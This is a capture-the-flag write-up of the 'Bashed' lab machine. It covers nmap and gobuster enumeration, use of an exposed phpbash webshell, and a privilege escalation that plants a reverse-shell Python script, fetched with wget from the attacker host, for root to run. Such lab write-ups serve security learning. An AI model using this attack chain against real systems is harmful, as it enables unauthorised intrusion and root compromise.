# BASHED | 10.10.10.68

## Initial Enumeration - nmap scan

    nmap -v -T4 -sC -sV -oN nmap/initial 10.10.10.68

### Open Pots and Their services

* 80 - HTTP - Apache 2.4.28 Ubuntu

### OS Discovery

An Ubuntu system

## Service Enumeration

### 80 - HTTP

This looks to be a developer's blog. The only entry talks about something called "phpbash", which looks like a bash webshell. The blog mentions developing it on that very site. If it is still there I could find a way in to their system.

![](img/port-80.png)

I run gobuster on the site to find more directories:

    gobuster dir -u http://10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php

Pretty quickly a number of interesting results show up, particularly the php and dev directories:

![](img/gobuster.png)

![](img/dev.png)

Looks like the developer (going by the name "Arrexel" - a possible username) has left a version of phpbash on the site, and in a sense, we have a shell:

![](img/phpwhoami.png)

If this were real, this would be pretty embarrassing, but it's all in good fun:

![](img/user-flag.png)

## User Enumeration

As the www-data user I am able to run commands as the user _scriptmanager_; this is probably a vector for privesc:

![](img/sudo-l.png)

## Privilege Escalation

Lets have a closer look at this user called _scriptmanager_:

This user does not have a lot of permissions, but they own a folder called 'scripts', which makes sense because of their username:

![](img/test-py.png)

There is a single python file in the scripts folder, with a basic command to open a file, write in it, then close the file.

Using that user's permissions, I can modify the file and use it to gain a proper tty shell.

I grabbed a quick and dirty [python reverse shell](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#python) script and uploaded it to a writable dir using `wget`:

    wget http://10.10.14.36/test.py

Then I overwrote the test.py file found in /scripts, using the `sudo -u` command:

    sudo -u scriptmanager cp test.py /scripts/test.py

Then I spun up a netcat listener on my end to catch the shell:

    rlwrap nc -nvlp 6969

And finally executed the script:

    sudo -u scriptmanager python test.py

And I had a stable tty shell, instead of the webshell:

![](img/whoami.png)

I went and brought over [linpeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) for some enumeration but I realized that with the original python script, the result was owned by root, which means that the script is run by root.  
If I had just waited with the netcat listener I would have gotten a connection eventually, and I would be root.

![](img/root-shell.png)

That's what I get for being impatient and not paying attention.

Anyway, here's the damn flag:

![](img/root-flag.png)

## Conclusion

Well, I tried to steamrool through this one, without really paying attention to what I was seeing, so I ended up going down a convoluted path to privesc.

I could have just uploaded a php reverse shell to the /uploads dir, from the webshell. And then, I could have gone straight from the www-data user to root if I had been more observant.

Steps taken:

* Use gobuster to find the /dev directory, find a php-based webshell
* Use the the user's `sudo -l` priv to write to an execute a python script that I modified to send a reverse shell back to me
* Then, literally just wait for the root user to execute the script, and get a root shell.
